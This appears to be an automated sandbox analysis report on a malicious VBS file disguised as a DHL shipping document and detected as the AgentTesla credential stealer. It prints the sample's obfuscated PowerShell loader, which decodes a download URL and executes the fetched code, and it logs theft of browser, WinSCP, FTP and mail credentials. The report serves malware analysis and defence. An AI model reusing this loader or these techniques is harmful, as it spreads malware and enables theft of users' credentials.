Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR

ID:	1430756
Product:	CloudBasic
Start time:	06:48:02
Start date:	24.04.2024
Sample:	DHL Shipping doc.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	e483b9251c12c243495cc209ff1fa8e1
SHA1:	3b1d7bdc1563c60ea44c9dd410018879fa1e392e
SHA256:	ab7caea9be94fcd8bf2b3bb9a1da2fbc4af30134a190718ffd81cdb4cc9a3641
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F93358E626551B46E6ED5A0A9D29BD51	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40azcxgo.inr.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfnafi35.syn.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ireixikg.yh2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofsvltvo.wog.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Aptychus.Whi	ASCII text, with very long lines (65536), with no line terminators	18A60C1DA6907146EEA018203ACF5089	01C5E653DBA0EDA7CABA355FEFFA97726515247C	1F5670E65D8367057D1CDC75DE0CA4B194CEF53AEE9311997B1D995ECF242B04

Windows Analysis Report
DHL Shipping doc.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report DHL Shipping doc.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
DHL Shipping doc.vbs

Malware Threat Intel
Provided by